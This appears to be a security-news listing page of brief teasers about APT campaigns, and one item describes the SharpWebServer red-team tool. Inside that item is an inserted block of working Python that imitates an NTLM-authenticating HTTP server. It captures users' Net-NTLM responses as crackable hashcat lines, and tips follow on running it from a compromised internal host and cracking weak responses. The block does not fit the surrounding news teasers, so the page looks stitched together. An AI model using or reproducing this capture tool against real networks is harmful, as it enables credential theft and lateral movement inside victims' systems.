The return of TA402 Molerats APT after a short pause

The TA402 APT group (aka Molerats, Gaza Cybergang and GazaHackerTeam) is back after two months of apparent inactivity and is targeting government institutions in the Middle East and global government entities with interest in the …

Ferocious Kitten APT targets Telegram and Psiphon VPN users in Iran

The Iran-linked Ferocious Kitten APT group used instant messaging apps and VPN software such as Telegram and Psiphon to deliver a Windows RAT and spy on targets’ devices. Researchers from Kaspersky reported that the threat actor, tracked as Ferocious Kitten, used these apps to deliver the RAT and spy on …

BackdoorDiplomacy APT targets diplomats from Africa and the Middle East

ESET researchers discovered a new state-sponsored advanced persistent threat (APT) group, tracked as BackdoorDiplomacy, that is targeting diplomats across Africa and the Middle East. The group was behind a series of cyberattacks against Ministries of Foreign Affairs in numerous African countries, the Middle East, Europe, and Asia. The …

Russia-linked APT breached the network of Dutch police in 2017

Russia-linked cyberspies breached the internal network of the Dutch police in 2017, while the authorities were investigating the crash of flight MH-17. The intrusion was uncovered by AIVD, the Dutch intelligence service, but was not disclosed by …

SharpWebServer – HTTP And WebDAV Server With Net-NTLM Hashes Capture Functionality

A simple Red Team-oriented HTTP and WebDAV server written in C# with functionality to capture Net-NTLM hashes, meant to be run on compromised machines to serve payloads for lateral movement. Requires .NET Framework 4.5 and references to System.Net and System.Net.Sockets. Usage: :: SharpWebServer :: a Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes …
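The capture side of such a server comes down to a three-message HTTP exchange: answer an unauthenticated request with 401 and WWW-Authenticate: NTLM, answer the client's NEGOTIATE (Type 1) with a CHALLENGE (Type 2) carrying a server challenge you chose, then parse the AUTHENTICATE (Type 3) and write out the NTLMv1/v2 response in a crackable format. The Python below is an added illustration of that logic, not SharpWebServer's code; the fixed challenge 1122334455667788, the dummy NTProofStr/blob and the alice/CORP/WS01 client are constructed for the example, and the message layouts follow MS-NLMP.

```python
# Added illustration of the NTLM-over-HTTP capture logic (not SharpWebServer's own
# code). Message layouts follow MS-NLMP; every sample message is constructed here.
import base64
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE_UNICODE = 0x00000001  # names in the message are UTF-16LE
NEGOTIATE_NTLM = 0x00000200     # NTLM auth; v1 vs v2 is decided by client policy
CHALLENGE_FLAGS = NEGOTIATE_UNICODE | NEGOTIATE_NTLM  # assumption: minimal Type 2 flags
# Constructed fixed challenge. A fixed challenge is what makes captured NTLMv1
# responses rainbow-table friendly; for NTLMv2 it simply goes into the hash line.
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")


def build_challenge_message(server_challenge: bytes) -> bytes:
    """Type 2 (CHALLENGE_MESSAGE): empty TargetName/TargetInfo, no Version field."""
    assert len(server_challenge) == 8
    empty_field = struct.pack("<HHI", 0, 0, 48)  # Len, MaxLen, Offset past 48-byte header
    return (NTLMSSP_SIGNATURE + struct.pack("<I", 2) + empty_field
            + struct.pack("<I", CHALLENGE_FLAGS) + server_challenge + b"\x00" * 8 + empty_field)


def _field(msg: bytes, at: int) -> bytes:
    """Resolve a (Len, MaxLen, Offset) descriptor found at `at` to its payload bytes."""
    length, _maxlen, off = struct.unpack_from("<HHI", msg, at)
    return msg[off:off + length]


def parse_authenticate_message(msg: bytes) -> dict:
    """Extract names and the LM/NT responses from a Type 3 (AUTHENTICATE_MESSAGE)."""
    if msg[:8] != NTLMSSP_SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLM AUTHENTICATE_MESSAGE")
    enc = "utf-16-le" if struct.unpack_from("<I", msg, 60)[0] & NEGOTIATE_UNICODE else "cp437"
    return {"lm_response": _field(msg, 12), "nt_response": _field(msg, 20),
            "domain": _field(msg, 28).decode(enc), "user": _field(msg, 36).decode(enc),
            "workstation": _field(msg, 44).decode(enc)}


def to_hashcat_line(server_challenge: bytes, auth: dict) -> str:
    """NetNTLMv2 line (hashcat -m 5600) or, for a 24-byte NT response, NetNTLMv1 (-m 5500)."""
    nt = auth["nt_response"]
    if len(nt) > 24:  # NTLMv2: 16-byte NTProofStr followed by the client blob
        return f"{auth['user']}::{auth['domain']}:{server_challenge.hex()}:{nt[:16].hex()}:{nt[16:].hex()}"
    return f"{auth['user']}::{auth['domain']}:{auth['lm_response'].hex()}:{nt.hex()}:{server_challenge.hex()}"


def ntlm_http_step(authorization, server_challenge: bytes):
    """One request of the HTTP NTLM dance -> (status, WWW-Authenticate value, captured line).

    The server never validates the Type 3 (it has no password to check against),
    so authentication always "succeeds" and the payload is served.
    """
    if not authorization or not authorization.startswith("NTLM "):
        return 401, "NTLM", None
    msg = base64.b64decode(authorization[5:])
    if msg[:8] != NTLMSSP_SIGNATURE:
        return 400, None, None
    mtype = struct.unpack_from("<I", msg, 8)[0]
    if mtype == 1:  # NEGOTIATE: answer with our challenge
        return 401, "NTLM " + base64.b64encode(build_challenge_message(server_challenge)).decode(), None
    if mtype == 3:  # AUTHENTICATE: capture, then let the request through
        return 200, None, to_hashcat_line(server_challenge, parse_authenticate_message(msg))
    return 400, None, None


def build_authenticate_message(user, domain, workstation, lm_response, nt_response) -> bytes:
    """Constructed Type 3 without Version/MIC; a real one comes from the victim's SSPI."""
    parts = [lm_response, nt_response, domain.encode("utf-16-le"),
             user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""]
    fields, payload, off = b"", b"", 64  # 64-byte header when Version/MIC are absent
    for part in parts:
        fields += struct.pack("<HHI", len(part), len(part), off)
        payload, off = payload + part, off + len(part)
    return NTLMSSP_SIGNATURE + struct.pack("<I", 3) + fields + struct.pack("<I", CHALLENGE_FLAGS) + payload


# Constructed NTLMv2 response: dummy NTProofStr and a minimal blob with empty AV pairs
SAMPLE_NT_PROOF = bytes(range(16))
SAMPLE_BLOB = (bytes.fromhex("0101000000000000") + b"\x00" * 8      # header, timestamp
               + bytes.fromhex("aabbccddeeff0011") + b"\x00" * 12)  # client nonce, AV EOL, pad


def demo():
    """Walk a constructed client through the three HTTP round trips."""
    steps = [ntlm_http_step(None, SAMPLE_CHALLENGE)]
    type1 = (NTLMSSP_SIGNATURE + struct.pack("<I", 1) + struct.pack("<I", CHALLENGE_FLAGS)
             + struct.pack("<HHI", 0, 0, 32) * 2)  # NEGOTIATE with empty Domain/Workstation
    steps.append(ntlm_http_step("NTLM " + base64.b64encode(type1).decode(), SAMPLE_CHALLENGE))
    type3 = build_authenticate_message("alice", "CORP", "WS01", b"\x00" * 24, SAMPLE_NT_PROOF + SAMPLE_BLOB)
    steps.append(ntlm_http_step("NTLM " + base64.b64encode(type3).decode(), SAMPLE_CHALLENGE))
    return steps


if __name__ == "__main__":
    for status, header, captured in demo():
        print(status, header or "-", captured or "-")
```

Two points worth keeping in mind when using a server like this. The server cannot tell a valid response from garbage, because it never holds the user's password; it simply records whatever the client sends and serves the file, so a capture is only as good as the cracking step that follows (the fixed challenge exists to make NTLMv1 responses attackable with precomputed tables, while NTLMv2 lines carry the challenge and must be brute-forced). And the client only volunteers credentials when its own policy allows it for that host, which is why such a server is run from an already-compromised machine inside the network rather than from the Internet.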

US seizes domains used by APT29 in recent USAID phishing attacks

The US Department of Justice has seized two Internet domains used in recent phishing attacks impersonating the U.S. Agency for International Development (USAID) to distribute malware and gain access to internal networks. The two domains seized by the DOJ are theyardservice[.]com and worldhomeoutlet[.]com and were used to receive data exfiltrated from victims of the targeted …

FBI: APT hackers breached US local govt by exploiting Fortinet bugs

The Federal Bureau of Investigation (FBI) says state-sponsored attackers breached the webserver of a U.S. municipal government after hacking a Fortinet appliance. "As of at least May 2021, an APT actor group almost certainly exploited a Fortigate appliance to access a webserver hosting the domain for a U.S. municipal government," the FBI's Cyber Division said …

Re-Checking Your Pulse: Updates on Chinese APT Actors Compromising Pulse Secure VPN Devices

On April 20, 2021, Mandiant published detailed results of our investigations into compromised Pulse Secure devices by suspected Chinese espionage operators. This blog post is intended to provide an update on our findings, give additional recommendations to network defenders, and discuss potential implications for U.S.-China strategic relations. Mandiant continues to gather evidence and respond to …

Surface Laptop 4 showcases Microsoft's new approach to PC security

Microsoft is bringing advanced hardware security to more Surface devices with cloud firmware management to help enterprises deploy new PCs quickly. Microsoft's Surface Laptop 4 is the second Surface device that uses Secured-core to protect the firmware. This brings what used to be optional security features that you had to test and manage, and then …

Pakistan-linked Transparent Tribe APT expands its arsenal

The allegedly Pakistan-linked cyber espionage group tracked as Transparent Tribe is targeting Indian entities with new Windows malware. Researchers from Cisco Talos warn that the group has expanded its Windows malware arsenal, using new malware dubbed ObliqueRAT in cyberespionage attacks against Indian targets. Operation Transparent Tribe (Operation C-Major, APT36, …